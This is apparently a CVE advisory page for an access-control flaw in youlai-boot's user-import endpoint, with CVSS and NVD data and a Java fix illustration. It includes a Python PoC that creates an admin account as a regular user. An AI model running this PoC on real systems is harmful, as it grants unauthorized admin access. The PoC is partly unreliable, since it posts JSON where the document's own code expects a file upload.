Security Vulnerability Report
CVE-2025-66736 CVSS 7.1 HIGH

Published: 2025-12-22 21:15:45
Last Modified: 2026-01-06 15:17:33

Description

youlai-boot V2.21.1 is vulnerable to Incorrect Access Control. The importUsers function in SysUserController.java does not perform a permission check on the current user's identity, which may allow regular users to import user data into the database, resulting in an authorization bypass vulnerability.
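The defect class described above (CWE-862, missing authorization on a controller endpoint) and the kind of fix that closes it, shown as an added illustration in Spring Boot. This is not youlai-boot's own code and not its patch: the class name, the `/api/v1/users` route, the `UserService` contract, the multipart parameter and the `sys:user:import` permission string are all assumed for the example.

```java
// Added illustration (not youlai-boot's code): the missing-authorization
// pattern behind CVE-2025-66736 next to a method-level check that closes it.
// Class, route, service contract and permission name are assumed here.
package example.security;

import org.springframework.context.annotation.Configuration;
import org.springframework.security.access.prepost.PreAuthorize;
import org.springframework.security.config.annotation.method.configuration.EnableMethodSecurity;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;
import org.springframework.web.multipart.MultipartFile;

// @PreAuthorize is only enforced when method security is switched on.
// Spring Security 6 uses @EnableMethodSecurity; Spring Security 5 used
// @EnableGlobalMethodSecurity(prePostEnabled = true). Without one of them
// the annotation below is silently ignored, which is a common reason an
// endpoint that "has" a permission check is still reachable by any user.
@Configuration
@EnableMethodSecurity
class MethodSecurityConfig {
}

@RestController
@RequestMapping("/api/v1/users")
public class UserImportController {

    // Assumed service contract used by both handlers.
    public interface UserService {
        String importUsers(MultipartFile file);
    }

    private final UserService userService;

    public UserImportController(UserService userService) {
        this.userService = userService;
    }

    // BEFORE (CWE-862 shape): the filter chain only establishes that the
    // caller is authenticated; no authorization rule names this endpoint,
    // so any logged-in account can bulk-create users.
    @PostMapping("/import-unguarded")
    public String importUsersUnguarded(@RequestParam("file") MultipartFile file) {
        return userService.importUsers(file);
    }

    // AFTER: authorization is evaluated before the handler body runs.
    // A caller without the 'sys:user:import' authority (assumed name)
    // receives 403 and the service layer is never reached.
    @PreAuthorize("hasAuthority('sys:user:import')")
    @PostMapping("/import")
    public String importUsers(@RequestParam("file") MultipartFile file) {
        return userService.importUsers(file);
    }
}
```

Two points worth checking in a code base with this pattern: that every privileged handler, not just the obvious ones, carries a permission expression (bulk import and export endpoints are easy to miss), and that method security is actually enabled in the application configuration, since a missing `@EnableMethodSecurity` leaves every `@PreAuthorize` in the project inert.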

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality Impact: Low
Integrity Impact: High
Availability Impact: None
Exploitability Score: 2.8
Impact Score: 4.2
Weaknesses: CWE-284, CWE-862

Configurations (Affected Products)

cpe:2.3:a:youlai:youlai-boot:2.21.1:*:*:*:*:*:*:* - VULNERABLE
youlai-boot V2.21.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-66736 PoC - youlai-boot Unauthorized User Import
import requests
import json

target_url = "http://target-server:8080/api/sys/user/import"

# Login as regular user to get valid session
login_url = "http://target-server:8080/api/auth/login"
login_data = {
    "username": "regular_user",
    "password": "user_password"
}

session = requests.Session()
login_response = session.post(login_url, json=login_data)

if login_response.status_code == 200:
    print("[+] Login successful as regular user")

    # Prepare malicious user data for import
    # This creates an admin user with username: hacker, password: P@ssw0rd123
    import_data = {
        "username": "hacker",
        "nickName": "Hacker Account",
        "email": "[email protected]",
        "password": "P@ssw0rd123",
        "roleIds": [1],  # Admin role ID
        "status": 1
    }

    # Send the import request without admin privileges
    headers = {
        "Content-Type": "application/json"
    }
    exploit_response = session.post(target_url, json=import_data, headers=headers)

    if exploit_response.status_code == 200:
        print("[+] VULNERABLE! Admin user created successfully")
        print("[+] Username: hacker, Password: P@ssw0rd123")
    else:
        print("[-] Request failed or patch applied")
else:
    print("[-] Login failed")
```

References

https://gist.github.com/old6ma/be1d4a5373ee2de901ed4c8d81485046 (Third Party Advisory)
https://gitee.com/youlaiorg/youlai-boot/commit/9197065102f92264ded814a9d3e9f2a4ff0da121 (Patch)
https://gitee.com/youlaiorg/youlai-boot/issues/ICH8FV (Exploit, Issue Tracking, Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-66736",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-22T21:15:44.917",
    "lastModified": "2026-01-06T15:17:32.990",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "youlai-boot V2.21.1 is vulnerable to Incorrect Access Control. The importUsers function in SysUserController.java does not perform a permission check on the current user's identity, which may allow regular users to import user data into the database, resulting in an authorization bypass vulnerability."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 4.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-284"},
          {"lang": "en", "value": "CWE-862"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:youlai:youlai-boot:2.21.1:*:*:*:*:*:*:*",
                "matchCriteriaId": "7CFBFBA2-A744-4EAE-A0F1-78CAE3F65176"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://gist.github.com/old6ma/be1d4a5373ee2de901ed4c8d81485046",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      },
      {
        "url": "https://gitee.com/youlaiorg/youlai-boot/commit/9197065102f92264ded814a9d3e9f2a4ff0da121",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://gitee.com/youlaiorg/youlai-boot/issues/ICH8FV",
        "source": "[email protected]",
        "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]
      }
    ]
  }
}
```